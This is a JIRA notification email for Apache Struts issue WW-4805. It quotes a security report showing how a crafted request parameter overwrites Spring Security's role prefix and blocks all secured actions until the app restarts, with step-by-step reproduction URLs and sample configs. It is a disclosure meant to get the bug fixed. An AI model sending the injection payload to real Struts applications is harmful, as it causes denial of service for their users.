[
https://issues.apache.org/jira/browse/WW-4805?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16053128#comment-16053128
]
ASF GitHub Bot commented on WW-4805:
------------------------------------
Github user lukaszlenart commented on the issue:
https://github.com/apache/struts/pull/142
With the flag in place you can always disable it in your {{struts.xml}}
event it the Spring Plugin is present.
> At least a DoS attack is available for Spring secured actions
> -------------------------------------------------------------
>
> Key: WW-4805
> URL: https://issues.apache.org/jira/browse/WW-4805
> Project: Struts 2
> Issue Type: Improvement
> Components: Core, Plugin - Spring
> Affects Versions: 2.3.32, 2.5.10
> Reporter: Yasser Zamani
> Labels: github-import, patch, security
> Fix For: 2.3.33, 2.5.next
>
>
> This is a DoS attack example when Struts2 user uses Spring to secure his
> actions, like mentioned at section `Initializing Actions from Spring` of
> [spring-plugin|https://struts.apache.org/docs/spring-plugin.html]
> Attack Steps:
> # An anonymous user logins as an authenticated user.
> # Then tries
> {noformat}
> http://{ip}:{port}/{action0-actionN}?advisors[{0-n}].advice.accessDecisionManager.decisionVoters[{0-n}].rolePrefix=breakit
> {noformat}
> where {action0-actionN} are actions available for users
> Attack Impacts:
> By replacing `rolePrefix`, attacker blocks access to secured actions for all
> defined roles even if they authenticate via login! so services are down and
> webapp restart is required to back to normal!!!
> Configuration Example:
> * spring-security.xml
> {code:xml}
> <global-method-security secured-annotations="enabled" proxy-target-class
> = "true" />
> <http auto-config="true" use-expressions="false">
> <intercept-url pattern="/**" access="IS_AUTHENTICATED_ANONYMOUSLY" />
> </http>
> <authentication-manager erase-credentials="false">
> <authentication-provider>
> <user-service>
> <user name="admin" password="admin" authorities="ROLE_ADMIN"
> />
> <user name="user" password="user" authorities="ROLE_USER" />
> </user-service>
> </authentication-provider>
> </authentication-manager>
> {code}
> * applicationContext.xml
> {code:xml}
> <bean id="secureAction"
> class="me.zamani.yasser.ww_convention.actions.SecureAction"/>
> {code}
> * struts.xml
> {code:xml}
> <action name="admin" class="secureAction" method="admin">
> <result name="success" type="json" />
> </action>
> <action name="user" class="secureAction" method="user">
> <result name="success" type="json" />
> </action>
> {code}
> * SecureAction.java
> {code:java}
> package me.zamani.yasser.ww_convention.actions;
> import org.springframework.security.access.annotation.Secured;
> public class SecureAction {
> @Secured({"ROLE_ADMIN"})
> public String admin() {
> return "success";
> }
> @Secured({"ROLE_USER"})
> public String user() {
> return "success";
> }
> }
> {code}
> * login via
> {noformat}
> http://{ip}:{port}/login
> {noformat}
> as user.
> * open
> {noformat}
> http://{ip}:{port}/user?advisors[0].advice.accessDecisionManager.decisionVoters[0].rolePrefix=breakit
> {noformat}
> * in another browser, login via
> {noformat}
> http://{ip}:{port}/login
> {noformat}
> as admin.
> * try to access
> {noformat}
> http://{ip}:{port}/admin
> {noformat}
> which fails!
> * also repeat 5 and try open
> {noformat}
> http://{ip}:{port}/user
> {noformat}
> which also fails!
> * Services are down and webapp restart is required to back to normal.
--
This message was sent by Atlassian JIRA
(v6.4.14#64029)
